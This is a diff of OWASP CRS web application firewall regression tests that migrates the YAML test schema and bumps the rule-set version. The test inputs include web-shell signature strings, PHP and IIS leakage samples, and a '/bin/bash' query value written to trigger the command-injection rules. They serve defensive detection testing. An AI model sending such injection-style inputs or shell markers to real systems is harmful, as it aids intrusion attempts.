"en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Field cannot be empty." + output: + log: + no_expect_ids: [953100] diff --git a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml index 57a366f..abb4ceb 100644 --- a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml +++ b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml @@ -1,112 +1,110 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953101.yaml" - description: "Tests for rule 953101" +rule_id: 953101 tests: - - test_title: 953101-1 + - test_id: 1 desc: "'File size is' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Maximum allowed file size is 10 MB"} - output: - log_contains: id "953101" - - test_title: 953101-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Maximum allowed file size is 10 MB"} + output: + log: + expect_ids: [953101] + - test_id: 2 desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Invalid date selected"} - output: - log_contains: id "953101" - - test_title: 953101-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Invalid date selected"} + output: + log: + expect_ids: [953101] + - test_id: 3 desc: "'The function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Please review the function"} - output: - log_contains: id "953101" - - test_title: 953101-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Please review the function"} + output: + log: + expect_ids: [953101] + - test_id: 4 desc: "'Static function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "This is a static function"} - output: - log_contains: id "953101" - - test_title: 953101-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "This is a static function"} + output: + log: + expect_ids: [953101] + - test_id: 5 desc: "'cannot be empty is too common for PL1, it should match at PL2 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "cannot be empty."} - output: - log_contains: id "953101" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "cannot be empty."} + output: + log: + expect_ids: [953101] diff --git a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml index 23d215a..ddcfda8 100644 --- a/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml +++ b/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml @@ -1,151 +1,149 @@ --- meta: author: "fzipi, azurit" - enabled: true - name: "953120.yaml" - description: "Positive tests for rule 953120" +rule_id: 953120 tests: - - test_title: 953120-1 + - test_id: 1 desc: "Just something that returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] + - test_id: 2 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] + - test_id: 6 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] diff --git a/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml index 4631f2c..fb954c0 100644 --- a/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml +++ b/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml @@ -1,25 +1,23 @@ --- meta: author: "Andrew Howe" - enabled: true - name: "954100.yaml" - description: "Tests for rule 954100" +rule_id: 954100 tests: - - test_title: 954100-1 + - test_id: 1 desc: 'Returns C:\inetpub in the response body' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"C:\\\\inetpub \\n\"}" - output: - log_contains: "id \"954100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"C:\\\\inetpub \\n\"}" + output: + log: + expect_ids: [954100] diff --git a/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml index c57700a..f13c4f3 100644 --- a/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml +++ b/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml @@ -1,45 +1,44 @@ --- meta: author: "Felipe Zipitria, azurit" - enabled: true - name: "954120.yaml" - description: "Tests for rule 954120 - IIS Error information disclusure" + description: "IIS Error information disclusure" +rule_id: 954120 tests: - - test_title: 954120-1 + - test_id: 1 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=404.14 - URL too long."} - output: - log_contains: id "954120" - - test_title: 954120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=404.14 - URL too long."} + output: + log: + expect_ids: [954120] + - test_id: 2 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} - output: - log_contains: id "954120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} + output: + log: + expect_ids: [954120] diff --git a/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/RESPONSE-955-WEB-SHELLS/955100.yaml index 52e743d..eb0f784 100644 --- a/tests/RESPONSE-955-WEB-SHELLS/955100.yaml +++ b/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -1,70 +1,68 @@ --- meta: author: "azurit" - enabled: true - name: "955100.yaml" - description: "Regression tests for rule 955100" +rule_id: 955100 tests: - - test_title: 955100-1 + - test_id: 1 desc: "Matching web shell NCC Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "

.:NCC:. Shell v"} - output: - log_contains: "id \"955100\"" - - test_title: 955100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "

.:NCC:. Shell v"} + output: + log: + expect_ids: [955100] + - test_id: 2 desc: "Matching web shell Simple PHP backdoor" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": ""} - output: - log_contains: "id \"955100\"" - - test_title: 955100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": ""} + output: + log: + expect_ids: [955100] + - test_id: 3 desc: "Matching web shell WinX Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "-:[GreenwooD]:- WinX Shell"} - output: - log_contains: "id \"955100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "-:[GreenwooD]:- WinX Shell"} + output: + log: + expect_ids: [955100] diff --git a/tests/RESPONSE-955-WEB-SHELLS/955260.yaml b/tests/RESPONSE-955-WEB-SHELLS/955260.yaml index 68483c2..4098fec 100644 --- a/tests/RESPONSE-955-WEB-SHELLS/955260.yaml +++ b/tests/RESPONSE-955-WEB-SHELLS/955260.yaml @@ -1,27 +1,25 @@ --- meta: author: "azurit" - enabled: true - name: "955260.yaml" - description: "Regression tests for rule 955260" +rule_id: 955260 tests: - - test_title: 955260-1 + - test_id: 1 desc: "Matching web shell Ru24PostWebShell. Our test infrastructure, currently, cannot run this test properly because of multiline output, so it's disabled." stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: "{\"body\": \"\\n\\nRu24PostWebShell -\"}" - output: - log_contains: "id \"955260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: "{\"body\": \"<html>\\n<head>\\n<title>Ru24PostWebShell -\"}" + output: + log: + expect_ids: [955260] diff --git a/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml index 46a3b54..1f1dbe8 100644 --- a/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml +++ b/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml @@ -1,72 +1,71 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "959100.yaml" description: | Test whether the outbound blocking mechanism works by testing whether rule 959100 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 959100 tests: - - test_title: 959100-1 + - test_id: 1 desc: Test is basically identical to 953120-1 (PHP leakage positive test in phase 4) but here we assert that the outbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "id \"959100\"" - - test_title: 959100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" + output: + log: + expect_ids: [959100] + - test_id: 2 desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "<?php12345"} - output: - no_log_contains: "id \"959100\"" - - test_title: 959100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "<?php12345"} + output: + log: + no_expect_ids: [959100] + - test_id: 3 desc: Test is basically identical to 959100-1 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" + output: + log: + match_regex: 'Outbound Anomaly Score Exceeded \(Total Score: ' diff --git a/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/RESPONSE-980-CORRELATION/980170.yaml index df07008..027c14d 100644 --- a/tests/RESPONSE-980-CORRELATION/980170.yaml +++ b/tests/RESPONSE-980-CORRELATION/980170.yaml @@ -1,78 +1,77 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "980170.yaml" description: | Test whether level 4 inbound reporting in phase 5 works by testing whether rule 980170 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the corresponding reporting rules to be triggered. +rule_id: 980170 tests: - - test_title: 980170-1 + - test_id: 1 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that was blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # Will match rules - # - 920273: restricted characters violation - # - 920350: numeric IP in Host header - # - 932160: Unix remote command execution - # - 932236: Unix command injection - # - 932260: Unix remote command execution - uri: "/get?a=/bin/bash" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # Will match rules + # - 920273: restricted characters violation + # - 920350: numeric IP in Host header + # - 932160: Unix remote command execution + # - 932236: Unix command injection + # - 932260: Unix remote command execution + uri: "/get?a=/bin/bash" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + expect_ids: [980170] + - test_id: 2 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - # Will match rule 920350: numeric IP in Host header - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + # Will match rule 920350: numeric IP in Host header + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + expect_ids: [980170] + - test_id: 3 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - no_log_contains: "id \"980170\"" + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + no_expect_ids: [980170] diff --git a/version.go b/version.go index 3877f36..e922ad0 100644 --- a/version.go +++ b/version.go @@ -7,6 +7,6 @@ package main const ( - crsVersion = "v4.4.0" + crsVersion = "v4.5.0" corazaVersion = "v3.2.1" )